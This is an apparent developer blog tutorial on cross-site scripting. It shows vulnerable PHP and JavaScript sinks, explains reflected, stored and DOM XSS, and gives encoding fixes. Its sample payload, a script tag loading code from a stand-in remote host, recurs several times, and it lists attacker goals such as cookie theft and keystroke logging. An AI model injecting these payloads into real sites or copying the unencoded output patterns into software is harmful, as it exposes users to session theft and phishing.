Mohammad Reza
Posted on April 18, 2020
In this article I want to show you what an XSS attack is.
Cross-Site Scripting (XSS)
"XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."
That is a good definition; you can read more about it on the OWASP site.
But we are developers :) so let's look at it in code.
<?php
// Vulnerable: each value comes straight from the query string and is written into the HTML without encoding.
echo '<div>' . $_GET["title"] . '</div>';
echo '<div>' . $_GET["body"] . '</div>';
echo '<div>' . $_GET["footer"] . '</div>';
If you have something like this in your code, you are exposed to XSS.
For example, consider someone sending
<script src="http://xxx.com/xxx.js"></script>
as the value of the title parameter in a GET request. Your page then serves something like
<div><script src="http://xxx.com/xxx.js"></script></div>
Oh ... so someone can run their JavaScript in your page, in your site's origin, with access to everything the page itself can access :/
OK, now let's look at the different kinds of XSS attacks to get more familiar with them.
1. Reflected XSS
Reflected XSS means the payload is reflected: the server reads it from the request and includes it in the response to that same request. Nothing is stored, so the attacker has to get the victim to open a crafted URL (for example via a link in an email or a chat message).
/search.php?q=hello would be an example where the search term then shows up on the page.
<?php
echo "You searched for " . $_GET["q"];
?>
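The two PHP snippets above show the bug; the fix is to encode every user-controlled value at the moment it is written into HTML. The following is an added example, not code from the original post: it re-creates the title/body/footer `echo` as a small Node.js renderer, once as vulnerable as the original and once with output encoding. The names `escapeHtml`, `renderUnsafe`, `renderSafe`, `containsScriptTag` and the sample request are this example's own, and `escapeHtml` does what PHP's `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')` would do in the PHP version.

```javascript
// Added example (not from the original post): the PHP echo re-created in Node.js,
// once vulnerable and once with output encoding. All names here are the example's own.

// Escape the five characters that can break out of an HTML text or attribute context.
// Equivalent to PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

const FIELDS = ['title', 'body', 'footer'];

// Vulnerable: mirrors `echo '<div>' . $_GET["title"] . '</div>';` for each field.
function renderUnsafe(params) {
  return FIELDS.map((name) => `<div>${params[name] ?? ''}</div>`).join('\n');
}

// Hardened: same markup, but every user-controlled value is encoded at the point it is
// written into HTML. Encoding belongs at output time, for the context you are writing into.
function renderSafe(params) {
  return FIELDS.map((name) => `<div>${escapeHtml(params[name] ?? '')}</div>`).join('\n');
}

// Simple check: would the HTML parser find a script element in this output?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed request: the payload from the post arrives as ?title=..., the other two fields are benign.
const PAYLOAD = '<script src="http://xxx.com/xxx.js"></script>';
const sampleParams = Object.fromEntries(
  new URLSearchParams({ title: PAYLOAD, body: 'hello', footer: 'bye' }),
);

console.log('--- unsafe ---\n' + renderUnsafe(sampleParams));
console.log('--- safe ---\n' + renderSafe(sampleParams));
```

The same `renderSafe` pattern is the fix for the reflected `search.php` case and, later in this post, for stored XSS: it does not matter whether the value came from the query string or from the database, only that it is encoded for the HTML context it lands in.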
But how can it actually hurt you :/
Here is a useful list of what an attacker's script can do once it runs in your page:
1. steal credentials in cookies that are not marked HttpOnly.
2. send requests to a server with the user's credentials. Think CSRF (XSRF), except that the script runs in your origin and can read the responses, so CSRF tokens do not stop it.
3. steal secrets that are stored in JS variables.
4. prompt the user to download content by submitting a form
5. display text that seems to come from the site owners. Think phishing.
6. display a password input, log keystrokes, and send the result to a site of the attacker's choosing
7. redirect to another site
8. get GPS/camera data if the user has already granted the site access to the device
2. Stored/Persistent XSS
If you find a way to store something like
<script src="http://xxx.com/xxx.js"></script>
in the database, or anywhere else persistent, and the application later writes it into a page without encoding, that is Stored XSS. It is worse than the reflected kind: the attacker does not need to trick anyone into clicking a link, because the script runs for every user who views that page, every time :)
3. DOM XSS
Here the server is not involved at all: the page's own JavaScript takes attacker-controlled data from a source such as document.baseURI, location.hash or document.referrer and writes it into the page through a dangerous sink such as document.write or innerHTML. Let's look at this example
<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>
If you open a URL like this
xxxxx.com/index.html#<script src="http://xxx.com/xxx.js"></script>
the script in the fragment is written into the page and runs. Note that the part after # is never sent to the server, so server-side validation or a WAF cannot see it; the fix has to be in the client-side code (use textContent instead of document.write, or encode the value before it becomes markup). Also, browsers that follow the WHATWG URL standard percent-encode < and > inside the fragment, so check what document.baseURI actually returns in the browser you are testing before relying on this exact payload.
And if you send such a link to other people, you can easily steal cookies from their browser or change the behaviour of the page on the web application as you like :)
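To make the "server never sees it" point concrete, here is an added example that is not code from the original post. It splits the URL above into what the browser puts on the wire and what the page's script can read, shows that a request-side filter cannot flag the payload, and writes the same "Current URL" line with the URL treated as text. The function names and the sample URL are this example's own; it runs under Node.js and uses the WHATWG `URL` parser that Node provides.

```javascript
// Added example (not from the original post): why DOM XSS is invisible to the server,
// plus a safe version of the "Current URL" line. All names here are the example's own.

// What the browser sends in the request line: path and query only. The fragment stays local.
function requestTarget(href) {
  const u = new URL(href);
  return u.pathname + u.search;
}

// What the page's own script can read: the fragment, via document.baseURI / location.hash.
// Browsers that follow the WHATWG URL standard percent-encode `<`, `>`, `"` and spaces in the
// fragment (older ones kept them raw), so we decode to show the payload either way.
function fragmentSeenByScript(href) {
  return decodeURIComponent(new URL(href).hash);
}

// A server-side filter, however strict, only ever sees requestTarget(): it cannot flag this.
function serverSideFilterFlags(href) {
  return /<script/i.test(requestTarget(href));
}

// The original sink as a pure function: the string the page would pass to document.write().
function renderCurrentUrlUnsafe(baseURI) {
  return '<b>Current URL</b> : ' + baseURI;
}

// Safe variant: the URL is data, so encode it before it becomes markup. In a real page you
// would skip the string building entirely and assign the URL to element.textContent.
function renderCurrentUrlSafe(baseURI) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return '<b>Current URL</b> : ' + String(baseURI).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Constructed URL: the post's payload placed in the fragment.
const SAMPLE_HREF = 'http://xxxxx.com/index.html#<script src="http://xxx.com/xxx.js"></script>';
// What document.baseURI contains in a browser that keeps the fragment exactly as typed.
const rawBaseUri = 'http://xxxxx.com/index.html' + fragmentSeenByScript(SAMPLE_HREF);

console.log('server sees   :', requestTarget(SAMPLE_HREF));
console.log('script sees   :', fragmentSeenByScript(SAMPLE_HREF));
console.log('unsafe render :', renderCurrentUrlUnsafe(rawBaseUri));
console.log('safe render   :', renderCurrentUrlSafe(rawBaseUri));
```

The practical consequence: logs, request-side input validation and a WAF give you no signal at all for DOM XSS, so the review has to be of the JavaScript itself, tracing every source (URL, referrer, postMessage data, storage) to the sink it ends up in.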
I hope you now understand what an XSS attack is and know its different types.
If you have any questions feel free to ask them
Have a nice time